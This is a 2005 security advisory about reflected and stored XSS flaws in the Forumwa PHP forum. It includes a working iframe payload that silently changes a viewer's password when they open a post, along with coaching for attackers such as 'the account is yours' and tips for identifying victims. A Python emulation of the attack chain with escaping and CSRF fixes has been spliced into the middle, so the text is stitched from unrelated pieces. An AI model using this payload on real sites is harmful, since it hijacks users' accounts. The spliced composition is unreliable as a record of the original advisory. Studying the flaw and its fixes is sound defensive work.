Forumwa search.php xss vulnerability

From: Raven (raventgs-security.com)
Date: Mon Feb 28 2005 - 18:35:21 CST


 [][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
 []
 [] HRG - Hackerlounge Research Group
 [] Release: HRG005
 [] Monday 03/01/05
 [] Forumwa_v1
 []
 [] The author can't be held responsible for any damage
 [] done by a reader. You have your own responsibility.
 [] Please use this document like it's meant to.
 []
 [][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
  
 Vulnerable: Forumwa_v1 (any version)
  
 
 ---
  
 General information:
  
 Forumwa is a simple discussion forum based on PHP
 and MySQL. Besides the basic features there are
 special functions such as a search function, user
 profiles, a member list, a mailer and feedback, plus
 multi-language support and easy installation.
  
  
 ---
  
 Description:
  
 The search.php script is vulnerable to a reflected
 XSS attack by a remote attacker. The searched string
 (the keyword parameter) is echoed back into the page
 without being filtered or encoded, so harmful
 characters like < > and " are interpreted as markup.
 This makes it possible for an attacker to trick a
 user into following a crafted link and, for example,
 steal that user's session.
  
 Also, the body and the subject of a message posted
 on the forum are not checked for < or > characters,
 so markup placed in a message is stored and rendered
 for every reader. The combination of these two
 vulnerabilities turns a link-based attack into a
 persistent one: a single post can silently trigger
 the search.php attack for anyone who views it.
  
  
 ---
  
 Proof Of Concept:
  
 This proof of concept embeds a 1x1 pixel iframe in a
 forum message. The iframe loads search.php with a
 keyword that abuses the XSS to inject a second,
 invisible iframe, which requests account.php and
 changes the viewer's password to "wh00ters". To use
 it, make a post containing the following body and
 wait for someone to view the message. As soon as a
 logged-in user opens the post, their password is
 changed and the account is yours. Tip: make it a
 thread people will reply to, so you know who you
 compromised.
  
 ---PoC Injection---
  
 <iframe SRC=http://[HOST URL CHANGEME!!!]/[FORUM DIRECTORY CHANGEME!!!]/search.php?keyword=%3C/title%3E%3Ciframe%20SRC=http://[HOST URL CHANGEME!!!]/[FORUM DIRECTORY CHANGEME!!!]/account.php?passwdu=wh00ters%26passwda=wh00ters%26emailu=umail.com%26changelog=change%20WIDTH=0%20HEIGHT=0%3E%3C/iframe%3E%3Ctitle%3E HEIGHT=1 WIDTH=1></iframe>
  
 ---PoC Injection---
  
 All that needs to be altered in this injection are
 the parts between [ ] that say "CHANGEME!!!". The
 outer iframe points at search.php; its keyword value
 carries the inner iframe with < and > encoded as %3C
 and %3E, and the & separators of the account.php
 query encoded as %26, so the whole inner request
 stays inside the keyword parameter until search.php
 decodes it and echoes it into the page.
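The chain from the Description and Proof Of Concept sections above, walked through in code. This is an added example, not Forumwa's own code: the three handlers (search.php echoing the keyword into the page title, message bodies rendered as-is, and account.php accepting a password change from a plain GET) are emulations assumed from what the PoC relies on, and forum.example stands in for the [HOST URL]/[FORUM DIRECTORY] placeholders. The escape flag is the output-side fix (htmlspecialchars with ENT_QUOTES in PHP); the hardened account.php shows why the password-change half needs a fix of its own.

```python
"""Emulation of the two Forumwa weaknesses in the advisory and their fixes.

Added example, not Forumwa's code. Assumptions: search.php echoes the raw
keyword into <title> (the PoC's </title> breakout needs this), post bodies are
rendered unfiltered, and account.php changes the password on any request that
carries passwdu/passwda, even a GET. forum.example is a placeholder host.
"""
import hmac
import html
import re
from urllib.parse import parse_qs, urlsplit

HOST = "http://forum.example/forumwa"  # assumed host, replaces the PoC placeholders

# Inner keyword from the advisory's PoC, still percent-encoded as it travels in the URL.
POC_KEYWORD = (
    "%3C/title%3E%3Ciframe%20SRC=" + HOST + "/account.php"
    "?passwdu=wh00ters%26passwda=wh00ters%26emailu=umail.com%26changelog=change"
    "%20WIDTH=0%20HEIGHT=0%3E%3C/iframe%3E%3Ctitle%3E"
)
# Outer payload as posted in a message body (the stored half of the chain).
POC_POST_BODY = "<iframe SRC=" + HOST + "/search.php?keyword=" + POC_KEYWORD + " HEIGHT=1 WIDTH=1></iframe>"


def keyword_from_query(query_string: str) -> str:
    """Percent-decode the keyword the way PHP's $_GET does (%26 becomes a literal &)."""
    return parse_qs(query_string, keep_blank_values=True).get("keyword", [""])[0]


def render_search(keyword: str, escape: bool) -> str:
    """Emulated search.php. escape=False is the vulnerable raw echo; escape=True is
    the fix (PHP equivalent: htmlspecialchars($keyword, ENT_QUOTES, 'UTF-8'))."""
    shown = html.escape(keyword, quote=True) if escape else keyword
    return "<html><head><title>Search: " + shown + "</title></head><body></body></html>"


def render_post(body: str, escape: bool) -> str:
    """Emulated message display: same raw-echo bug and same fix, for the stored half."""
    shown = html.escape(body, quote=True) if escape else body
    return '<div class="post">' + shown + "</div>"


def live_iframes(page: str) -> list:
    """iframe tags that survived as real markup in a rendered page."""
    return re.findall(r"<iframe[^>]*>", page, flags=re.IGNORECASE)


def account_change(method: str, params: dict, session_token: str, hardened: bool) -> bool:
    """Emulated account.php. Vulnerable mode honours any request carrying the fields, so
    the hidden iframe's GET (sent with the victim's cookie) succeeds. Hardened mode
    requires POST plus a CSRF token bound to the victim's session."""
    if not params.get("passwdu") or params.get("passwdu") != params.get("passwda"):
        return False
    if hardened:
        if method != "POST":
            return False
        if not hmac.compare_digest(params.get("csrf", ""), session_token):
            return False
    return True


def run_chain(escape_output: bool, harden_account: bool) -> dict:
    """Walk the PoC: stored post -> reflected search.php -> GET against account.php."""
    outer = live_iframes(render_post(POC_POST_BODY, escape_output))
    result = {"stored_iframe": bool(outer), "reflected_iframe": False, "password_changed": False}
    if not outer:
        return result
    search_url = re.search(r"SRC=(\S+)", outer[0]).group(1)
    keyword = keyword_from_query(urlsplit(search_url).query)
    inner = live_iframes(render_search(keyword, escape_output))
    result["reflected_iframe"] = bool(inner)
    if not inner:
        return result
    attack_url = re.search(r"SRC=(\S+)", inner[0]).group(1)
    attack_params = {k: v[0] for k, v in parse_qs(urlsplit(attack_url).query).items()}
    # The victim's browser issues this GET with their session cookie; no token travels.
    result["password_changed"] = account_change("GET", attack_params, "victim-token", harden_account)
    return result


if __name__ == "__main__":
    print("vulnerable:", run_chain(escape_output=False, harden_account=False))
    print("encoded output:", run_chain(escape_output=True, harden_account=False))
    print("CSRF-hardened only:", run_chain(escape_output=False, harden_account=True))
```

run_chain(False, False) reproduces the advisory's outcome. Either fix alone breaks this particular chain, but they address different bugs: output encoding stops the stored and reflected injections, while the POST-plus-token check stops a silent password change from any other vector, so a real patch needs both.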
  
  
 ---
  
 Fix and Vendor status:
  
Vendor has been notified; expect an official patch
soon.
  
 ---
 
Greetz:
 
All the people at hackerlounge.com, JWT,
TGS-Security.com and JWT-Security.net.
Specifically:
 
Th3_Rv3n (me), Dlab, Riddick, Enjoi, Blademaster,
Modzilla, Pingu, Jake Johnson, Afterburn, airo,
cardiaC, chis, ComputerGeek, deep_phreeze, dudley,
evasion, eXtacy, Mattewan, Afterburn,
Thanatos_Starfire, Roz, Sirross, UmInAsHoE, Infinite,
Slarty, NoUse, Snake (I hate you), Surreal (I hate
you), -=Vanguard=-, The_IRS, puNKiey, driedice,
Carnuss, oKiDaN, Mr.Mind, dementis, net-RIDER,
voteforpedro, Cryptic_Override, kodaxx,
~CreEpy~NoDquE~, Brainscan, the_exode,
phillysteak12345, DerrtyJake, =>HeX<=, m0rk, and
anyone else I forgot.
 
 
---
 
Credit:
 
HRG - Hackerlounge Research Group
http://www.Hackerlounge.com
 
  